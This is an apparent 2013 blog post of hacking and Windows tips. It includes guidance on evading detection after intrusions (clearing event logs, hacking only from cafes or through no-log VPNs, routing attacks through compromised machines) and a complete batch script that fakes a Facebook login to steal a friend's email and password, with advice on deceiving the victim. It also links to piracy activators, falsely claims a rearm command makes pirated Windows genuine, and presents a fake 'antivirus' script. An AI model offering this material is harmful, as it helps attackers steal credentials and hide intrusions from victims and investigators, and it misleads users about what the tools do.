Friday, June 21, 2013

Secure your Hacking

1) How hackers get caught.

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/­messages or binarys.

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours mby days when they will be caught.
*Don't use hotmail. CIA Owns it.

2) Hiding and Securing you as "Hacker"
- Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave's computers as a tool for a launching place to get into another computer.

There will always be hackers, and there will always be hackers in prison.

* DESTROY LOGS, REMOVE ALL YOUR TRACKS!

* DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!

HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, "Do you want to save 'System' before clearing it?", enter a file name for the saved system log file, and then click Save.

Virtual Private Network - VPN

1) I will recommend you to use paid VPN which keeps no logs .

CREATE U R OWN ANTIVIRUS.................

NOW WILL I SHOW U HOW TO CREATE U R OWN ANTIVIRUS.................

The main functioning of Antivirus is to detect and remove harmful or unwanted files which may slowdown your computer and windows. But if you don't have enough time to download any best antivirus. Then simply use this trick to make your own antivirus.

This antivirus scan by using command prompt and delete unwanted files automatically.

Open your Notepad and paste this given code

@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean
cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit


Now save your file with Computerfreaks.bat and select "All files"

now run your saved files automatically scan starts 

how to change logon screen without any software

1> Press ‘Win Key + R’ and then type regedit, hit enter.

2> Go to HKEY_LOCAL_MACHINE > SOFTWARE >Microsoft > Windows > CurrentVersion > Authentication > LogonUI > Background

3> Double click on key ‘OEMBackground’ and change its value to 1. If you can’t find this key go ahead and create a new one. Right click and choose DWORD and name it OEMBackground.

4> Now go to C:\Windows\System32\oobe. If you can find a folder named ‘info’ then its fine, otherwise create it and inside that folder make another folder ‘backgrounds’.

5> You’re almost done, rename the background you want to use as ‘BackgroundDefault.jpg’ and place in backgrounds layer.

Remember the jpg you chose should be less than 256kb in size. You can use a service like Smush it!. Don’t have a nice background? Try this. In case you want to use a software try TweaksLogon. Have Fun!

How To Reinstall Windows Without Losing Anything -

You can use this method as often as you like when you need to repair something that had gotten corrupted and you don't want to do a clean install.
This is better than doing a windows repair install from the cd because doing that can cause changes to settings and even make it so you can't get updates anymore from microsoft update site because of the 'silent install' they did a year or so ago (unless you rereg some dll files).
1- Start WindowsXP
2- Go to the location of your source files
3- Run WINNT32 /unattend
For example, D:\I386\winnt32 /unattend ( copy & paste this command into the RUN box, then press ENTER ) Your computer will do the rest.
OR
Start > All Programs > Accessories > Command Prompt. Copy & paste > D:\I386\winnt32 /unattend (notice the space between 32 and / ) Press Enter.
If you have i386 on your drive, you can replace D: ( if D: is your cd drive ) with the location of it. (be sure it's the full i386 though)
D: is the driver letter where your windows XP Cd is if D:\I386\winnt32 /unattend doesn't work then try : d:\winnt32 /unattend.

WINDOWS ACTIVATORS­


Activate all versions of windows!!
Use the below activators for activating windows.

Win7­-
http://v.gd/wPgWpm
It not only activates but also gives the geniune watermark!!

Win8­
http://v.gd/NG97u8
Activates windows 8 with personalization enabled.

Other versions­
http://v.gd/YZPFOZ
It works for windows 8,windows 7,vista,xp and various other versions of windows. 

make your windows 7 genuine using command prompt.

How many of you using Genuine windows 7 ?
we all know that everyone can't buy a genuine windows 7, because cost is too high.
Lots of Windows 7 users have experienced the error message that "Windows 7 is not genuine".
This error message comes if you use pirated or OEM versions of Windows 7.
If windows 7 is not genuine, even you can't change the background wallpaper or any other display related option on your PC.

So now i'm going to show you a easy way to make your windows 7 genuine using command prompt.

How to make Windows 7 genuine using Command Prompt

Press Windows key + R
Now "run" box will appear , in "run" box type CMD
Click on OK
Note : Run CMD as Administrator

Now command prompt will appear

In command prompt type SLMGR -REARM
Hit Enter.

Wait 5-10 seconds

Now a message will appear

Done !!!
Now your Windows 7 is genuine .. 
Restart your PC once. Hereafter you won't see the warning message that "Windows 7 is not genuine"

Facebook phishing using a USB drive

Here is a simple trick to get the Email and password of a person via a USB drive with some social engineering.

1. Open notepad and paste the following code and leave a blank line after the code.

TITLE FBChat

ECHO OFF

COLOR 03

CLS

ECHO.

ECHO LOGIN TO START CHATTING ON FACEBOOK

ECHO.

ECHO Please enter your email:

SET/P "MAIL=>"

ECHO.

ECHO Enter the password:

SET/P "PSWD=>"

ECHO EMAIL = %MAIL%>>FBChat.bat

ECHO PASSWORD = %PSWD%>>FBChat.bat

CLS

TIMEOUT /T 5 >NUL

COLOR 0C

ECHO.

ECHO An error occurred while connecting to the server. Try again later.

PAUSE>NUL

EXIT

---------- Below this line are the collected information ----------

2. Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.

3. Put the batch file into a USB drive and give it to your friend.

When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!

With some social engineering the trick can be very efficient. Before trying this trick out you can tell the victim you are making a cool software and it will be finished soon. Than give the batch file telling him that is the software you made. Try to be convincing and do not let him/her smell a rat! I have tried this trick on some of my friends with 100 percent success. Give it a try yourself